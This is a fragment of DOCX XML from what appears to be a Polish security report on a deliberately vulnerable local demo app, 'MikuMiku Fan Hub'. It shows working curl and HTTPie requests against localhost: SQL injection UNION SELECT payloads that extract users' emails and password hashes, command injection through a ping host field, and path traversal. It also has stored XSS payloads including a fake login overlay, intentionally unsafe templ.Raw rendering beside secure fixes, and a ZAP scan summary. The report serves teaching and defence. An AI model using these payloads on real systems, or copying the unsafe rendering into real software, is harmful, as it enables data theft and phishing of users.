        <w:t>. Ten etap jest istotny, ponieważ pokazuje, że podatności nie są zależne od przeglądarki, formularza HTML ani podpowiedzi w interfejsie. Atakujący może odpytać ten sam backend bezpośrednio przez HTTP i uzyskać ten sam rezultat, jeżeli warstwa serwisowa buduje zapytanie SQL lub polecenie systemowe w sposób niebezpieczny.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Najpierw wykonano zwykłe, poprawne wywołanie wyszukiwarki biblioteki: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curl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-sG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"http://127.0.0.1:8102/api/search"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--data-urlencode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"q=Miku"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jq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".mode, (.results[] | {id,title,author_username})"</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2016" w:name="lst16"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 16. Żądanie curl użyte do weryfikacji endpointu HTTP. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2016"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Wynik poprawnego użycia zawierał zwykły wpis fanowski </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Miku Expo setlist notes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Następnie tym samym endpointem przesłano payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, który utworzył sztuczny rekord wynikowy z informacją o liczbie użytkowników i nazwach tabel SQLite. Kolejny wariant odczytał rekordy z tabeli </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t>, w tym role, adresy e-mail i jawne sekrety przechowywane w trybie vulnerable.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curl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-sG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"http://127.0.0.1:8102/api/search"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--data-urlencode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"q=zz' UNION SELECT 9000, '[curl intel] database map',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'users=' || (SELECT COUNT(*) FROM users) ||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' tables=' || (SELECT group_concat(name, ', ')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               FROM sqlite_master WHERE type='table'),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1, 'curl-probe', '', '' --"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jq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".results[0]"</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2017" w:name="lst17"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 17. Żądanie curl użyte do weryfikacji endpointu HTTP. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2017"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ten sam klient wykorzystano również do funkcji </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Stream relay check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, czyli sprawdzania hosta przez endpoint ping. W trybie vulnerable parametr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trafia do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sh -c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dlatego po średniku udało się uruchomić dodatkowe polecenie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uname -s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. W odpowiedzi pojawił się znacznik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>BAI_CHAIN_MARKERDarwin</w:t>
      </w:r>
      <w:r>
        <w:t>, co potwierdza wykonanie fragmentu pochodzącego od użytkownika. Endpoint secure odrzucił identyczny input kodem HTTP 400, ponieważ walidacja dopuszcza tylko litery, cyfry, kropki i myślniki.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339288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l-api-attack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92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19" w:name="fig19"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 19. curl - ataki HTTP na funkcjonalności aplikacji. Źródło: wynik narzędzia curl uruchomionego lokalnie.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1019"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Weryfikacja żądań przy użyciu HTTPie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Trzecim narzędziem użytym do weryfikacji był </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTTPie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. W odróżnieniu od </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nie automatyzuje ono wykrywania podatności, ale dobrze nadaje się do czytelnego przedstawienia żądania i odpowiedzi HTTP. W raporcie wykorzystano je jako drugi niezależny klient HTTP obok </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:t>, aby pokazać, że podatności są właściwością endpointów backendu, a nie konkretnego formularza w przeglądarce.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Poprawne wywołanie wyszukiwarki przez HTTPie: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--ignore-stdin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--print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hb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:8114/api/search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q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Miku</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2018" w:name="lst18"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 18. Żądanie HTTPie użyte do weryfikacji endpointu HTTP. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2018"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Wariant SQL Injection wykonany przez HTTPie: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--ignore-stdin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--print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hb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:8114/api/search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q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"zz' UNION SELECT id, '[httpie user] ' || username,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  'role=' || role || ' email=' || email || ' secret=' || password_hash,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  1, username, '', '' FROM users --"</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2019" w:name="lst19"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 19. Żądanie HTTPie użyte do weryfikacji endpointu HTTP. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2019"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Tym samym narzędziem sprawdzono również Path Traversal w funkcji </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fanart vault</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Endpoint vulnerable zwrócił fragment pliku </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/db/db.go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, natomiast endpoint secure odrzucił identyczną ścieżkę komunikatem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>invalid filename</w:t>
      </w:r>
      <w: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--ignore-stdin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--print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hb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:8114/api/files-vulnerable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name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../internal/db/db.go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--ignore-stdin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--print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hb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:8114/api/files-secure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    </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>name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../internal/db/db.go</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2020" w:name="lst20"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 20. Żądanie HTTPie użyte do weryfikacji endpointu HTTP. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2020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017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tpie-tool-attack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01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20" w:name="fig20"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 20. HTTPie - weryfikacja SQL Injection i Path Traversal. Źródło: wynik narzędzia HTTPie uruchomionego lokalnie.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1020"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Skan DAST przy użyciu OWASP ZAP w Dockerze</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Jako uzupełnienie ręcznych żądań i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uruchomiono pasywny skan DAST przy użyciu OWASP ZAP w oficjalnym obrazie Docker. Skan wykonano na lokalnej aplikacji w trybie vulnerable. ZAP nie zastępuje ręcznej analizy podatności, ale dobrze pokazuje, które problemy są widoczne dla zewnętrznego skanera po przejściu po ekranach i endpointach aplikacji.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Komenda uruchamiająca ZAP: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docker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run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--rm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-v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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>$PWD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/docs/generated/zap:/zap/wrk:rw</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>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-t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ghcr.io/zaproxy/zaproxy:stable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zap-baseline.py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-t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http://host.docker.internal:8114/ui/library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-r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zap-baseline-report.html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-J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zap-baseline-report.json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-w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zap-baseline-report.md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\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-I</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2021" w:name="lst21"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 21. Fragment materiału testowego (bash). Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2021"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Najważniejsze wyniki skanu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="3002" w:name="tbl2"/>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Tabela 2. Zestawienie danych raportowych. Źródło: opracowanie własne.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3002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9EA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Wskaźnik ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4819"/>
            <w:shd w:fill="D9EA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Wynik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Liczba odwiedzonych URL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60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Nowe błędy krytyczne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Nowe ostrzeżenia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14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Reguły zakończone powodzeniem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53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Raporty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HTML, JSON, Markdown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ZAP wykrył między innymi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Source Code Disclosure - SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> na endpointach związanych z wyszukiwarką, brak tokenów anty-CSRF w formularzach trybu podatnego, brak nagłówka CSP, brak </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>X-Content-Type-Options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> oraz potencjalnie kontrolowane atrybuty HTML w parametrach wejściowych. Wynik jest spójny z projektem: aplikacja uruchomiona w trybie vulnerable celowo eksponuje mechanizmy, które w trybie secure są ograniczane lub neutralizowane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Fragment podsumowania z konsoli ZAP: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Total of 60 URLs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FAIL-NEW: 0    WARN-NEW: 14    PASS: 53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WARN-NEW: Source Code Disclosure - SQL [10099] x 3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WARN-NEW: Absence of Anti-CSRF Tokens [10202] x 5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WARN-NEW: User Controllable HTML Element Attribute (Potential XSS) [10031] x 3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WARN-NEW: Content Security Policy (CSP) Header Not Set [10038] x 5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WARN-NEW: X-Content-Type-Options Header Missing [10021] x 5</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2022" w:name="lst22"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 22. Fragment materiału testowego (text). Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2022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321041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-docker-baselin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1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21" w:name="fig21"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 21. OWASP ZAP Docker - skan baseline aplikacji. Źródło: opracowanie własne.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1021"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="23" w:name="sec23"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.3. B. Stored XSS w komentarzach fan postów</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja strony:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> użytkownicy komentują fan posty.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Poprawne użycie:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> użytkownik wpisuje zwykły komentarz, np. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Świetna setlista, dodajcie jeszcze link do Magical Mirai</w:t>
      </w:r>
      <w:r>
        <w:t>. Komentarz jest zapisywany i wyświetlany pod wpisem jako treść tekstowa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Atak w trybie vulnerable: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Atakujący otwiera post, np. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/posts/view/1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>W formularzu komentarza wpisuje HTML/JavaScript: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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>h2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style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"color:#be123c"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XSS-PWNED-vulnerable</w:t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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>h2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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2023" w:name="lst23"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 23. Fragment implementacji aplikacji (html). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2023"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Bardziej efektowny wariant pokazuje, że XSS to nie tylko </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>alert</w:t>
      </w:r>
      <w:r>
        <w:t>, ale możliwość przejęcia interfejsu czytelnika. Poniższy komentarz dodaje fałszywy ekran ponownego logowania na wierzchu strony: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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>img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src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x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onerror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"document.body.insertAdjacentHTML(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'afterbegin',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'&lt;div style=&amp;quot;position:fixed;inset:0;z-index:9999;background:#111827;color:white;padding:40px&amp;quot;&gt;' +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'&lt;h1&gt;Session expired&lt;/h1&gt;&lt;p&gt;Fake re-login overlay injected from a comment.&lt;/p&gt;&lt;/div&gt;'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>)"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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2024" w:name="lst24"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 24. Fragment implementacji aplikacji (html). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2024"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>Formularz wysyła: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v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x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f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"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>#</w:t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3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"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X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v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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2025" w:name="lst25"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 25. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2025"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t>W trybie vulnerable komentarz jest zapisany i później renderowany jako raw HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing B.1 - kod niezabezpieczony: raw HTML w komentarzu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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;p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class=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"text-sm text-slate-800"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c.Body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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;/p&gt;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else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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;div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class=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"text-sm text-slate-800"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@templ.Raw(c.Body)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;/div&gt;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26" w:name="lst26"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 26. Fragment implementacji aplikacji (templ). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2026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6559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xss-vulnerab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55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22" w:name="fig22"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 22. Stored XSS vulnerable. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1022"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ten sam krok w trybie secure:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Użytkownik wysyła taki sam komentarz i payload z fałszywą nakładką.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Serwis zapisuje go po escapowaniu albo oczyszczeniu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Widok renderuje go jako tekst, nie jako HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listing B.2 - kod zabezpieczony: oczyszczenie i escapowanie treści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CreateComment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postID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author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int64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stored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stored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html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EscapeString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stripUnsafeHTML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res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Exec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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"INSERT INTO comments (post_id, author, body) VALUES (?, ?, ?)"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postID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author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stored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E7490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LastInsertId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27" w:name="lst27"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 27. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2027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75434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xss-secur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75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23" w:name="fig23"/>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Rysunek 23. Stored XSS secure. Źródło: zrzut ekranu z aplikacji MikuMiku Fan Hub.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1023"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ocena rezultatu:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> podatność wynika ze sposobu renderowania treści użytkownika. Tryb secure zachowuje funkcję komentarzy, ale uniemożliwia wykonanie HTML/JavaScript w przeglądarce czytelnika.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="24" w:name="sec24"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>11.4. C. CSRF w ustawieniach profilu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja strony:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> użytkownik zmienia email powiadomień w profilu. Endpoint funkcji to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Poprawne użycie:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zalogowany użytkownik wpisuje nowy adres email w formularzu profilu. Po wysłaniu aplikacja zapisuje adres jako email powiadomień.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Atak w trybie vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Ofiara jest zalogowana w MikuMiku Fan Hub.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Atakujący przygotowuje stronę z formularzem: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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
